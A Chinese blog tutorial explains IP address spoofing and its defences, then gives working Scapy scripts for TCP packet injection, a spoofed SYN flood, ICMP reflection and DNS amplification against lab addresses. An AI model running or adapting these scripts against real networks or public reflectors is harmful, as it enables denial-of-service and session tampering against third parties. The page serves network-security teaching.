首页 > 其他分享 >使用 Scapy 库编写 IP 地址欺骗攻击脚本

使用 Scapy 库编写 IP 地址欺骗攻击脚本

时间:2024-06-01 21:28:57浏览次数:18  
标签:__ target 攻击 IP Scapy IP地址 ip 欺骗 数据包

一、介绍

1.1 概述

IP地址欺骗(IP Spoofing)是一种网络攻击技术,攻击者伪造其数据包的源IP地址,使其看起来像是从其他合法地址发送的。这种技术常用于各种攻击中,例如DDoS攻击、Man-in-the-Middle(MITM)攻击和拒绝服务(DoS)攻击等。

1.2 攻击原理

IP地址欺骗的核心在于攻击者能够创建带有伪造源IP地址的IP数据包。当目标系统接收到这些数据包时,会误以为它们来自合法的来源,从而执行攻击者预期的操作。由于IP协议本身并不验证数据包的源地址,这种攻击变得相对容易实现。

1.3 具体类型

  1. 非盲欺骗(Non-blind Spoofing)

    • 攻击者能够看到目标系统和合法来源之间的通信。通过截获和分析数据包,攻击者可以伪造合法的IP地址并插入恶意数据包。
  2. 盲欺骗(Blind Spoofing)

    • 攻击者无法看到目标系统和合法来源之间的通信,只能猜测数据包的内容和序列号。盲欺骗通常用于攻击需要少量数据包的协议(如ICMP和UDP)。
  3. 反射攻击(Reflection Attack)

    • 攻击者伪造数据包的源IP地址,使其看起来像是来自目标系统,并将这些数据包发送到第三方服务器。第三方服务器会将响应数据包发送到目标系统,形成反射攻击。
  4. 放大攻击(Amplification Attack)

    • 类似于反射攻击,但利用能够产生大响应的数据包服务(如DNS和NTP),使目标系统收到大量响应数据包,从而导致资源耗尽。

1.4 防御措施

  1. 反向路径转发(Reverse Path Forwarding, RPF)

    • 在路由器上启用RPF检查,确保数据包的源地址与预期路径匹配。若不匹配,则丢弃数据包。
  2. 访问控制列表(ACL)

    • 在网络设备上配置ACL,限制哪些IP地址可以发送数据包到特定的网络资源。
  3. 入侵检测和防御系统(IDS/IPS)

    • 部署IDS/IPS,实时监控网络流量,检测并阻止异常的流量模式和伪造的数据包。
  4. 网络防火墙

    • 配置防火墙规则,过滤异常的IP地址和不合法的源IP地址。
  5. 网络分段

    • 使用虚拟局域网(VLAN)技术将网络分段,减少欺骗攻击的影响范围。

二、实验环境

受害者:192.168.134.148

三、实操演示

3.1 非盲欺骗(Non-blind Spoofing)

在非盲欺骗中,攻击者能够看到目标系统和合法来源之间的通信,因此可以伪造合法IP地址并插入恶意数据包。

实验步骤:

  1. 设置环境

    • 攻击者设备能够嗅探目标设备的通信。
    • 使用Wireshark或类似工具观察目标设备和合法来源之间的通信。
  2. 捕获合法数据包

    • 捕获目标设备和合法来源之间的通信,特别是TCP连接建立过程(SYN, SYN-ACK, ACK)。
  3. 插入伪造数据包

    • 使用Scapy构造带有合法序列号和确认号的TCP数据包。
from scapy.all import *
from scapy.layers.inet import TCP


def non_blind_spoofing(target_ip, spoofed_ip, target_port, seq_num, ack_num):
    packet = IP(src=spoofed_ip, dst=target_ip) / TCP(sport=12345, dport=target_port, seq=seq_num, ack=ack_num, flags="PA") / b"Non-blind spoofing attack"
    send(packet)


if __name__ == "__main__":
    target_ip = "192.168.134.148"  # 目标系统的IP地址
    spoofed_ip = "192.168.1.1"   # 伪造的源IP地址
    target_port = 80             # 目标系统开放的端口
    seq_num = 1000               # 合法通信中捕获的序列号
    ack_num = 1001               # 合法通信中捕获的确认号
    non_blind_spoofing(target_ip, spoofed_ip, target_port, seq_num, ack_num)

这里的话其实开两台主机通信效果最明显 

3.2 盲欺骗(Blind Spoofing)

在盲欺骗中,攻击者无法看到目标系统和合法来源之间的通信,只能猜测数据包的内容和序列号。这里使用ICMP协议进行简单的盲欺骗示例。 

实验步骤:

  1. 发送大量伪造SYN数据包
    • 使用Scapy发送大量带有伪造源IP地址的SYN数据包。
from scapy.all import *
import random
from scapy.layers.inet import TCP


def blind_spoofing(target_ip, target_port):
    for _ in range(100):  # 发送100个伪造的SYN数据包
        spoofed_ip = "192.168.1." + str(random.randint(1, 254))
        packet = IP(src=spoofed_ip, dst=target_ip) / TCP(sport=random.randint(1024, 65535), dport=target_port, flags="S")
        send(packet)


if __name__ == "__main__":
    target_ip = "192.168.134.148"  # 目标系统的IP地址
    target_port = 80             # 目标系统开放的端口
    blind_spoofing(target_ip, target_port)

3.3 反射攻击(Reflection Attack)

反射攻击利用中间服务器(反射器)将攻击数据包反射回目标系统。攻击者伪造数据包的源IP地址,使其看起来像是来自目标系统,并将数据包发送到第三方服务器。

from scapy.all import *
from scapy.layers.inet import ICMP


def reflection_attack(target_ip, reflector_ip):
    # 发送多个ICMP Echo请求包
    for _ in range(10):  # 发送10个反射攻击包
        packet = IP(src=target_ip, dst=reflector_ip) / ICMP() / b"Reflection attack"
        send(packet)
        print(f"Sent packet to {reflector_ip} with spoofed source {target_ip}")


if __name__ == "__main__":
    target_ip = "192.168.134.148"  # 目标系统的IP地址
    reflector_ip = "192.168.134.147"     # 反射器的IP地址,例如公共DNS服务器
    reflection_attack(target_ip, reflector_ip)

3.4 放大攻击(Amplification Attack)

放大攻击利用能够产生大响应的数据包服务(如DNS和NTP),使目标系统收到大量响应数据包,从而导致资源耗尽。以下示例展示了如何通过伪造源IP地址来实现DNS放大攻击。

from scapy.all import *
from scapy.layers.dns import DNS, DNSQR
from scapy.layers.inet import UDP


def amplification_attack(target_ip, dns_server_ip):
    # 构造DNS查询请求
    dns_request = IP(src=target_ip, dst=dns_server_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname="www.hubstc.com.cn"))
    for _ in range(10):  # 发送10个放大攻击包
        send(dns_request)
        print(f"Sent DNS request to {dns_server_ip} with spoofed source {target_ip}")


if __name__ == "__main__":
    target_ip = "192.168.134.148"    # 目标系统的IP地址
    dns_server_ip = "192.168.134.147"      # 公共DNS服务器的IP地址
    amplification_attack(target_ip, dns_server_ip)

四、注意事项

  1. 合法性和道德规范:确保在合法和授权的环境中进行实验,不得在未经授权的网络上进行IP地址欺骗实验。
  2. 网络隔离:确保实验网络与生产网络隔离,避免对实际业务造成影响。
  3. 监控与恢复:实验过程中实时监控网络和系统状态,实验结束后立即停止攻击工具,并确保系统恢复正常。

标签:__,target,攻击,IP,Scapy,IP地址,ip,欺骗,数据包
From: https://blog.csdn.net/2302_82189125/article/details/139293229

相关文章

  • python的scapy解读pcap包
    好的,下面是一个使用Python和scapy库来解读pcap文件的示例代码。scapy是一个非常强大的网络数据包处理库,可以用来捕获、解读和生成网络数据包。首先,确保你已经安装了scapy:pipinstallscapy然后,创建一个Python文件(例如read_pcap.py),在其中编写以下代码:fromsc......
  • 【NOIP2018普及组复赛】题1:标题统计
    题1:标题统计题目描述凯凯刚写了一篇美妙的作文,请问这篇作文的标题中有多少个字符?注意:标题中可能包含大、小写英文字母、数字字符、空格和换行符。统计标题字符数时,空格和换行符不计算在内。【输入格式】输入文件只有一行,一个字符串......
  • NOIP2024模拟赛10:热烈张扬
    NOIP2024模拟赛10:热烈张扬T1一句话题意:给定一颗树和两个玩家的起点\(a,b\)和各自的移动速度\(da,db\).问:如果二人均以最优策略移动,问最后谁是赢家(先走到对方当前位置)标签:LCA,思维,博弈不妨设\(a\)是速度快的,\(b\)是速度慢的。结论一:若二者初始距离\(\le\)先手......
  • Linux系统编程之进程间通信(IPC)
    一.进程间通信概述进程间通信(IPC,InterProcessCommunication)是指在不同进程之间传播或交换信息。IPC的方式通常有管道(包括无名管道和命名管道)、消息队列、信号量、共享存储、Socket、Streams等。其中Socket和Streams支持不同主机上的两个进程IPC二.管道1.匿名管道(1)特点1......
  • 总结常用9种下载(限速、多线程加速、ZIP、导Excel)
    一、前言下载文件在我们项目很常见,有下载视频、文件、图片、附件、导出Excel、导出Zip压缩文件等等,这里我对常见的下载做个简单的总结,主要有文件下载、限速下载、多文件打包下载、URL文件打包下载、Excel导出下载、Excel批量导出Zip包下载、多线程加速下载。二、搭建SpringBoo......
  • 在iPhone上恢复已删除的Safari历史记录的最佳方法
    您是否正在寻找恢复iPhone上已删除的Safari历史记录的最佳方法?好吧,这篇文章提供了4种在有/无备份的情况下恢复iPhone上已删除的Safari历史记录的最佳方法。现在按照分步指南进行操作。iPhone上的Safari历史记录会被永久删除吗?当您选择清除Safari历史记录时,它......
  • 使用Spring Boot自定义注解 + AOP实现基于IP的接口限流和黑白名单
    ......
  • 2021 NOIP
    廊桥分配1.错误想法:让当前飞机停到右端点最小的廊桥,但是当两个区间右端点都小于当前飞机左端点,选择最小的么?显然不是,应该选择序号最小的廊桥,这样不影响下一个飞机继续放置(左端点从小打到排序的)。这样,当只能有i个廊桥(枚举国内廊桥)的时候,也是可以取得最大值的。最后前缀和。错误......
  • 【JavaScript脚本宇宙】从i18next到Date-fns:国际化和本地化库
    跨越JavaScript新境界:六大库全面评测前言本文将详细介绍六种具有不同功能的JavaScript库,包括处理多语言支持、全球化和本地化、格式化日期、数字和字符串,解析、验证、操作、显示日期和时间,格式化和操作数字,以及最全面、最简单和一致的工具集用于处理JavaScript中的日期等......
  • HTML期末学生大作业-基于班级校园我的校园网页设计与实现html+css+javascript
    ......